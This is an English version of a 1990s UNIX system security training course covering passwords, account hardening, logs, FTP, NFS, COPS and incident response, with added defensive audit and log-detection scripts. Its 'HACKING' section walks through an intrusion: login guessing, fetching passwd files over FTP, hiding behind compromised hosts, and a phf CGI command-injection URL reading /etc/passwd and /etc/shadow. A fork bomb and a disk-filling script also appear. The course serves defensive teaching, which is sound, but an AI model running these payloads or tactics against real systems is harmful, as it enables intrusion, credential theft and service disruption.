
System Security Management
Yun-Chia Regional Network Center Training Course
Computer Center, National Chung Cheng University
張永榴 (chang.tw)

Contents
PART I. UNIX Security Basics
PART II. Enforcing Security on Your System
PART III. Handling Security Incidents

PART I. UNIX Security Basics
1. Introduction
2. Users and Passwords
3. The UNIX Filesystem

Introduction
A computer is secure if you can depend on it and its software to behave as you expect it to.
The three parts of UNIX:
- the kernel
- standard utility programs
- system database files

Users and Passwords: the crypt algorithm
    Password   Salt   Encrypted password
    nutmeg     Mi     MiqkFWCm1fNJI
    ellen1     ri     ri79KNd7V6.Sk
    Sharon     ./     ./2aN7ysff3qM
    norahs     am     amfIADT2iqjAf
    norahs     7a     7azfT5tIdyh0I
The same password (norahs) encrypts to a different string under a different salt.

The /etc/passwd file:
    root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
    daemon:*:1:1:/tmp
    uucp:ooRoMN9FyZNE:4:4:/usr/spool/uucpublic:/usr/lib/uucp/uucico
    rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/csh
    arlin:f8fk3jlOrf34:182:100:Arlin Steinberg:/u/arlin:/bin/csh

Bad passwords: your login name, anybody's name, a birth date, a phone number, a place name, all the same letter, a word in the English dictionary, all numbers, fewer than 6 characters, ...

Administrative techniques:
- assign passwords to users
- crack your own passwords
- shadow password files
- password aging and expiration

Summary:
- ensure every account has a password
- ensure every user chooses a strong password
- use a shadow password file, if available

PART II. Enforcing Security on Your System
1. Defending Your Accounts
2. Securing Your Data
3. The UNIX Log Files
4. Modems
5. Networks and Security
6. NFS
7. COPS
8. Patch Installation
9. Firewall

Defending Your Accounts
Dangerous accounts:
- accounts without passwords
- default accounts
- accounts that run a single command
- open accounts
Protecting the root account:
- secure terminals
- the wheel group
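As an added example, not part of the course slides, these POSIX shell functions check a passwd file for the dangerous accounts listed above, and a hosts.equiv file and a search path for two other conditions the COPS report later in the deck flags; sample_passwd is a constructed file whose entries mirror that report, and file names are whatever the caller passes in.

```shell
#!/bin/sh
# Added example: COPS-style checks for the conditions the slides list.

# audit_passwd [FILE]: one "Warning!" line per problem in a passwd-format file
# (reads stdin when no file is given): empty password field, negative uid,
# uid 0 on an account other than root, duplicate user name
audit_passwd() {
    awk -F: '
    NF < 7 {
        printf("Warning! Password file, line %d, wrong number of fields: %s\n", NR, $0); next
    }
    $2 == "" {
        printf("Warning! Password file, line %d, no password: %s\n", NR, $1)
    }
    $3 ~ /^-/ {
        printf("Warning! Password file, line %d, negative user id: %s\n", NR, $1)
    }
    $3 == 0 && $1 != "root" {
        printf("Warning! Password file, line %d, user %s has uid = 0 and is not root\n", NR, $1)
    }
    $1 in seen {
        printf("Warning! Password file, line %d, duplicate user name: %s\n", NR, $1)
    }
    { seen[$1] = NR }' "$@"
}

# audit_hosts_equiv FILE: a "+" entry trusts every host, as the COPS report warns
audit_hosts_equiv() {
    grep -n '^+' "$1" | while IFS=: read -r lineno entry; do
        printf 'Warning! A "+" entry in %s, line %s: %s\n' "$1" "$lineno" "$entry"
    done
}

# audit_path PATH_VALUE: "." and an empty component (::) both mean the
# current directory, the condition COPS flags in root's path
audit_path() {
    case ":$1:" in
        *:.:*|*::*) printf 'Warning! "." (or current directory) is in the path: %s\n' "$1" ;;
    esac
}

# sample_passwd: constructed entries mirroring the findings in the COPS report
sample_passwd() {
    cat <<'EOF'
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
nobody:*:-2:-2:Nobody:/:/bin/false
sync::1:1:sync:/:/bin/sync
sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
EOF
}
```

Run `sample_passwd | audit_passwd` to see the three warnings, or `audit_passwd /etc/passwd` on a real file.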

Securing Your Data
File backups:
1. Why back up? User error, system staff error, hardware error, software error, electronic break-ins, natural disaster.
2. What should you back up? User files, system databases, any system directories.
3. How long to keep backups?
Daily checks of the system database files: /etc/passwd, /etc/group, /etc/rc*, /etc/ttys, /etc/inittab, /usr/spool/cron/crontabs, /etc/aliases, /etc/exports, /etc/vfstab, /etc/netgroup

The UNIX Log Files
- /usr/adm/lastlog
- /etc/utmp, /usr/adm/wtmp, /usr/adm/wtmpx
- /usr/adm/pacct
- /usr/adm/sulog

Modems
1. Devices: /dev/modem, /dev/ttys(0-9), /dev/ttyfa, /dev/ttyda, /dev/cua*
2. Mode and owner:
    chmod 600 /dev/modem
    chown root /dev/modem
3. Modem hang-up checking:

Networks and Security
Trusted ports 0-1023: the /etc/services file
rlogin and rsh: /etc/hosts.equiv, /.rhosts, the "r" commands in the /etc/inetd.conf file, /.netrc
Remote printing: /etc/hosts.lpd

Networks and Security
Finger: /etc/inetd.conf, then kill -1 pid_of_inetd
Sendmail:
1. the debug, wiz and kill commands
2. delete the decode alias from the aliases file (decode: "|/usr/bin/uudecode")
3. disable the "wizard" password in the sendmail.cf file. Example:
    #Let the wizard do what she want
    OWsitrVlWxktZ67

Networks and Security
Anonymous FTP:
1. Create the ftp account.
2. mkdir ftp/bin ftp/etc ftp/pub
3. cp /bin/ls ftp/bin
4. chmod 111 ftp/pub ftp/etc ftp/bin ftp/bin/ls
5. cp /etc/passwd ftp/etc/passwd
6. cp /etc/group ftp/etc/group
7. chmod 444 ftp/etc/*
8. chown root ftp ftp/etc ftp/bin
9. chown ftp.ftp ftp/pub
10. chmod 555 ftp

NFS
- the /etc/exports file
- the exportfs command
- the showmount command

COPS
Checks file, directory and device file permissions, the /etc/passwd and /etc/group files, and SUID files. Example report:
ATTENTION:

Security Report for Wed Dec 18 13:30:30 CST 1991 from host
Warning! A "+" entry in /etc/hosts.equiv!
Warning! "." (or current directory) is in root's path!
Warning! Directory /usr/spool/mail is _World_writable!
Warning! File /etc/motd is _World_writable!
Warning! File /etc/mntab is _World_writable!
Warning! File /etc/remote is _World_writable!
Warning! File /etc/sm is _World_writable!
Warning! File /etc/sm.bak is _World_writable!
Warning! File /etc/state is _World_writable!
Warning! File /etc/tmp is _World_writable!
Warning! File /etc/utmp is _World_writable!
Warning! User uucp's home directory /var/spool/uucpublic is mode 03777
Warning! Password file, line 2, negative user id: nobody:*:-2:-2:/:
Warning! Password file, line 11, no password: sync:1:1:/:/bin/sync
Warning! Password file, line 12, user sysdiag has uid = 0 and is not root
    sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag

Patch Installation
.tw example:

Denial of Service Attacks and Solutions
I. Destruction attacks
1. Reformatting a disk partition => prevent anyone from accessing the machine in single-user mode; protect the superuser account.
2. Deleting critical files => protect system files by specifying appropriate modes (e.g. 755 or 711); protect the superuser account.
3. Turning off the power => put the computer in a physically secure location.

Denial of Service Attacks and Solutions
II. Overload attacks
1. Process overload attacks. Example:
    main() { while (1) fork(); }
   => Solaris: in /etc/system, set maxproc=100
2. System overload => set your own priority as high as you can with the renice command.

Denial of Service Attacks and Solutions
IV. Tree structure attacks. Example:
    #!/bin/ksh
    while mkdir another
    do
        cd ./another
        cp /bin/cc fillitup
    done
=> DIY
=> shell script
=> delete the inode of the top directory:
    # boot -s
    # ls -i another
    # df another
    # /usr/sbin/clri /dev/dsk/c0t2d0s2 1491
    # fsck /dev/dsk/c0t2d0s2

PART III. Handling Security Incidents
System intrusion checks:
1. Check the connection log files for unusual sources or operations.
2. Find all setuid and setgid files on the system.
3. Check whether system executables have been modified, e.g. login, su, telnet, netstat, ifconfig, ls, find, du, df, sync, and any program listed in /etc/inetd.conf.
4. Check whether a network sniffer is running on the system.
5. Check all programs run by cron and at.

PART III. Handling Security Incidents
Finding traces of intruders in the log files:
- users logging in at odd hours: last
- the system rebooting for no known reason: w, last
- the system time changing for no known reason: time
- unusual error messages from sendmail, ftp and so on: /var/adm/syslog, xferlog
- unauthorized or suspicious use of the su command: /usr/adm/sulog
- users coming from unfamiliar sites: who, last

PART III. Handling Security Incidents
When an intrusion is discovered:
I. Identify and understand the problem
II. Contain the damage
III. Confirm your diagnosis and determine the damage
IV. Restore the system
V. Deal with the root cause
VI. Carry out the related recovery work

HACKING
There are several ways to get into a host: via Telnet (port 23), Sendmail (port 25), FTP, or WWW (port 80). A host has only one address, but it may run several services at the same time, so if all you want is to get into that host, these ports are all good directions to try.
A demonstration of getting into a host (by CoolFire):
(First connect to a Telnet host on which you already have an account; preferably a fake one, that is, a host that has already been cracked, and then use it to crack other hosts, so that nobody can trace your location by following the trail back.)
    Digital UNIX () (ttypa)
    login: FakeName
    Password:
    Last login: Mon Dec 2 03:24:00 from
(The one I use is ..., fake of course; it has all been edited! There is no such host! Don't worry! Don't worry! All the host names below are fake names!)
    Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
    Digital UNIX V1.2C Worksystem Software (Rev. 248)
    Digital UNIX Chinese Support V1.2C (rev. 3)
(OK, we're in! Let's start the attack! Today's target is ....)
    telnet                      (Let's try Telnet.)
    Trying 55.
    Connected to .
    Escape character is .
    Password:
    Login incorrect
(Never mind, again!)
    cool login: hinet
    Password:
    Login incorrect
(Neither guess was right; the method used here is plain guessing, and today's luck doesn't seem to be good.)

HACKING (Continued)
(Start over, try another port!)
    telnet 55 80
    Trying 55.
    Connected to 55.
    Escape character is .
    Error
    Error 400
    Invalid request (unknown method) CERN-HTTPD 3.0A
    Connection closed by foreign host.
(What! Not even a place to type a password, really... Again! Be persistent!)
(Try the FTP port.)

HACKING (Continued)
    ftp 55
    Connected to 55.
    220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
    Name (55:FakeName): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230-Welcome, archive user! This is an experimental FTP server. If have any
    230-unusual problems, please report them via e-mail to root
    230-If you do have problems, please try using a dash (-) as the first character
    230-of your password - this will turn off the continuation messages that may
    230-be confusing your ftp client.
    230-
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
(Wow! Anonymous login works! For the password just type aaa; don't leave footprints!)

HACKING (Continued)
    ftp> ls
    200 PORT command successful.
    150 Opening ASCII mode data connection for file list.
    etc
    pub
    usr
    bin
    lib
    incoming
    welcome.msg
    226 Transfer complete.
(Great! We're in! The next target is ....)
    ftp> cd etc
    250 CWD command successful.
    ftp> get passwd             (Grab it!)
    200 PORT command successful.
    150 Opening BINARY mode data connection for passwd (566 bytes).
    226 Transfer complete.
    566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(Oh. Is it this easy?)

HACKING (Continued)
    ftp> !cat passwd            (Let's look!)
    root:0:0:root:/root:/bin/bash
    bin:*:1:1:bin:/bin:
    daemon:*:2:2:daemon:/sbin:
    adm:*:3:4:adm:/var/adm:
    lp:*:4:7:lp:/var/spool/lpd:
    sync:*:5:0:sync:/sbin:/bin/sync
    shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
    halt:*:7:0:halt:/sbin:/sbin/halt
    mail:*:8:12:mail:/var/spool/mail:
    news:*:9:13:news:/var/spool/news:
    uucp:*:10:14:uucp:/var/spool/uucp:
    operator:*:11:0:operator:/root:/bin/bash
    games:*:12:100:games:/usr/games:
    man:*:13:15:man:/usr/man:
    postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
    ftp:*:404:1:/home/ftp:/bin/bash
(Damn, it's shadowed. A bad start.)
    ftp> bye
    221 Goodbye.

HACKING (Continued)
(Not giving up. Same old story: be persistent.)
(FTP didn't work, so try Telnet again!)
    telnet
    Trying 55.
    Connected to .
    Escape character is .
    Password:
    Login incorrect
(Wrong guess again!)
    cool login: hackme
    Password:
    Last login: Mon Dec 2 09:20:07 from 2
    Linux 1.2.13.
    Some programming languages manage to absorb change but withstand progress.
    cool:$
(Haha! Which dumb root used the system name as both username and password! The effort finally paid off!)

HACKING (Continued)
We fetched a "jumbled" /etc/passwd; did you think I was really that dumb? What good could anything fetched as guest be? So we continue the previous attack: we have already guessed a username and password that is not guest, so let's use it to get into the host and have a look!
    Digital UNIX () (ttypa)
    login: FakeName
    Password:
    Last login: Mon Dec 2 03:24:00 from
    Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
    Digital UNIX V1.2C Worksystem Software (Rev. 248)
    Digital UNIX Chinese Support V1.2C (rev. 3)
(OK, in! Start the attack! This time's target is ....)
    telnet                      (Let's try Telnet.)
    Trying 55.
    Connected to .
    Escape character is .
    cool login: hackme
    Password:                   (Type hackme again.)

HACKING (Continued)
    Last login: Mon Dec 1 12:44:10 from
    Linux 1.2.13.
    cool:$ cd /etc
    cool:/etc$ ls pa*
    passwd passwd.OLD passwd.old
    cool:/etc$ more passwd      (See whether there is a shadow file.)
    root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
    john:234ab56:9999:13:John Smith:/home/john:/bin/john:
(Excellent! No protection at all!)
    cool:/etc$ exit
    logout
(Leaving! FTP's turn!)
    Connection closed by foreign host.

HACKING (Continued)
    ftp
    Connected to .
    220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
    Name (:66126): hackme
    331 Password required for hackme.
    Password:
    230 User hackme logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files
    ftp> cd /etc
    250 CWD command successful.
    ftp> get passwd
    200 PORT command successful.
    150 Opening BINARY mode data connection for passwd (350 bytes).
    226 Transfer complete.
    350 bytes received in 0.68 seconds (1.9 Kbytes/s)
    ftp> !cat passwd
    root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
    john:234ab56:9999:13:John Smith:/home/john:/bin/john:
(Look! Ha! It's the real thing!)
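Once a demonstration like the one above has shown how an intruder reaches a shell, checks 2 and 3 of the PART III intrusion checklist (setuid/setgid inventory, modified system binaries) are the administrator's follow-up. The POSIX shell functions below are an added example, not course material; they assume paths without whitespace and a baseline file kept where the intruder cannot rewrite it.

```shell
#!/bin/sh
# Added example (not from the slides): checks 2 and 3 of the PART III
# intrusion checklist. Assumes paths without whitespace (cksum output is
# split on blanks) and a baseline kept where an intruder cannot edit it.

# list_setuid DIR: every regular file under DIR with the setuid or setgid bit
list_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# baseline_sums DIR OUT: record "crc size path" for each regular file under DIR
baseline_sums() {
    find "$1" -type f -exec cksum {} + | sort -k3 > "$2"
}

# verify_sums DIR BASELINE: print added, modified and removed files relative
# to BASELINE; returns 0 when nothing changed, 1 when something did
verify_sums() {
    [ -s "$2" ] || { echo "empty baseline: $2" >&2; return 2; }
    current=$(mktemp) || return 2
    find "$1" -type f -exec cksum {} + | sort -k3 > "$current"
    awk 'NR == FNR { base[$3] = $1; next }
         !($3 in base)                  { print "added:    " $3; n++ }
         ($3 in base) && base[$3] != $1 { print "modified: " $3; n++ }
         { seen[$3] = 1 }
         END { for (p in base) if (!(p in seen)) { print "removed:  " p; n++ }
               exit (n > 0) }' "$2" "$current" && rc=0 || rc=$?
    rm -f "$current"
    return $rc
}
```

Typical use is `baseline_sums /usr/bin /mnt/readonly/usr-bin.sums` right after installation and `verify_sums /usr/bin /mnt/readonly/usr-bin.sums` whenever an intrusion is suspected.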

HACKING (Continued)
II. CGI hole (phf.cgi)
    .tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:0:0000-Admin(0000):/:/sbin/sh
    daemon:x:1:1:0000-admin(0000):/:
    bin:x:2:2:0000-admin(0000):/usr/bin:
    sys:x:3:3:0000-admin(0000):/:
    adm:x:4:4:0000-admin(0000):/var/adm:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nobody:x:60001:60001:uid no body:/:
    hansin:x:109:1:/home1/hansin:/usr/lib/rsh
    dayeh:x:110:1:/home1/dayeh:/usr/lib/rsh
Try again:
    .tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

HACKING (Continued)
#1 FTP intrusion method? Not a very practical method!
1. Connect to the FTP server.
2. When the system asks for the User Name, just press Enter and ignore it.
3. For the Password, enter: quote user ftp
4. Then enter: quote cwd root
5. Then enter
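The CGI hole above works because %0a decodes to a newline that ends the ph command line, so whatever follows it is run as a separate command. As an added example, not from the course, the POSIX shell functions below decode the query of each phf request in a web access log and report the text after that newline; the log lines are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the slides): spot phf requests that smuggle an encoded
# newline (%0a) into the query, the pattern on the CGI-hole slide. Constructed log.

# urldecode STRING: decode %XX escapes with portable awk (no gawk extensions);
# an invalid escape such as %zz is kept as-is
urldecode() {
    printf '%s\n' "$1" | awk 'BEGIN { hex = "0123456789abcdef" }
    {
        s = $0; out = ""
        while ((p = index(s, "%")) > 0) {
            h = tolower(substr(s, p + 1, 2))
            if (h ~ /^[0-9a-f][0-9a-f]$/) {
                c = (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1
                out = out substr(s, 1, p - 1) sprintf("%c", c); s = substr(s, p + 3)
            } else {
                out = out substr(s, 1, p); s = substr(s, p + 1)
            }
        }
        print out s
    }'
}
nl='
'
# phf_attempts: read common-log-format lines on stdin; for each request to
# /cgi-bin/phf whose query carries %0a, print the client and the decoded text
# after the newline (what phf handed to the shell); %0a at the very end is noted
phf_attempts() {
    while read -r client _ _ _ _ _ url _; do
        case $url in */cgi-bin/phf\?*) ;; *) continue ;; esac
        query=${url#*\?}
        case $(printf '%s' "$query" | tr 'A-Z' 'a-z') in *%0a*) ;; *) continue ;; esac
        decoded=$(urldecode "$query")
        case $decoded in
            *"$nl"*) printf '%s %s\n' "$client" "${decoded#*$nl}" ;;
            *)       printf '%s (newline at end of query)\n' "$client" ;;
        esac
    done
}
# sample_log: constructed lines; the first and third mirror the slide's requests
sample_log() {
    cat <<'EOF'
10.0.0.5 - - [02/Dec/1996:09:20:07 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 566
10.0.0.7 - - [02/Dec/1996:09:21:10 +0800] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 312
10.0.0.5 - - [02/Dec/1996:09:22:33 +0800] "GET /cgi-bin/phf?Qalias=x%0A/bin/cat%20/etc/shadow HTTP/1.0" 200 88
10.0.0.9 - - [02/Dec/1996:09:23:00 +0800] "GET /index.html HTTP/1.0" 200 1024
EOF
}
```

`sample_log | phf_attempts` reports the two injected commands and ignores the legitimate phf lookup; a real log is fed with `phf_attempts < access_log`.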
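The ten anonymous FTP setup steps from the Networks and Security slide as a script, with a check of the resulting modes: an added example, not course material. It differs from the slide in two places, stated in the comments: modes are applied after the copies so it also runs unprivileged, and ftp/etc/passwd and ftp/etc/group contain only the ftp entry rather than copies of the real files, since the anonymous session in the demonstration downloads exactly that passwd; FTP_HOME, the uid 404 and gid 1 (taken from the demonstration's dump) and /bin/false are the example's own choices.

```shell
#!/bin/sh
# Added example (not from the slides): the ten anonymous FTP setup steps as a
# script plus a check of the resulting modes. Two deliberate differences:
# modes are set after the copies so the script also works unprivileged, and
# etc/passwd and etc/group hold only the ftp entry instead of copies of the
# real files, which an anonymous client can download (as the demonstration
# session did). Step 1 (creating the ftp account) is left to the administrator.

# setup_anon_ftp FTP_HOME
setup_anon_ftp() {
    home=$1
    mkdir -p "$home/bin" "$home/etc" "$home/pub"                  # step 2
    cp "$(command -v ls)" "$home/bin/ls"                         # step 3
    # steps 5 and 6: minimal files; uid 404/gid 1 as in the demo's dump,
    # /bin/false chosen here so the entry can never log in
    printf 'ftp:*:404:1:Anonymous FTP:/:/bin/false\n' > "$home/etc/passwd"
    printf 'ftp:*:1:\n' > "$home/etc/group"
    chmod 444 "$home/etc/passwd" "$home/etc/group"                # step 7
    chmod 111 "$home/pub" "$home/etc" "$home/bin" "$home/bin/ls"  # step 4
    if [ "$(id -u)" -eq 0 ]; then                                 # steps 8 and 9
        chown root "$home" "$home/etc" "$home/bin"
        id ftp >/dev/null 2>&1 && chown ftp:ftp "$home/pub"
    fi
    chmod 555 "$home"                                             # step 10
}

# mode_of PATH: the ten permission characters from ls -ld, e.g. d--x--x--x
mode_of() { ls -ld "$1" | cut -c1-10; }

# expect_mode PATH MODE: complain and return 1 when PATH is not MODE
expect_mode() {
    actual=$(mode_of "$1")
    [ "$actual" = "$2" ] || { echo "$1: expected $2, got $actual"; return 1; }
}

# check_anon_ftp FTP_HOME: verify every mode from the slide; 0 only if all match
check_anon_ftp() {
    home=$1; rc=0
    expect_mode "$home"            dr-xr-xr-x || rc=1
    expect_mode "$home/bin"        d--x--x--x || rc=1
    expect_mode "$home/etc"        d--x--x--x || rc=1
    expect_mode "$home/pub"        d--x--x--x || rc=1
    expect_mode "$home/bin/ls"     ---x--x--x || rc=1
    expect_mode "$home/etc/passwd" -r--r--r-- || rc=1
    expect_mode "$home/etc/group"  -r--r--r-- || rc=1
    return $rc
}
```

`setup_anon_ftp /home/ftp && check_anon_ftp /home/ftp` builds the tree and confirms it; rerun check_anon_ftp from cron to catch a mode that has drifted.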
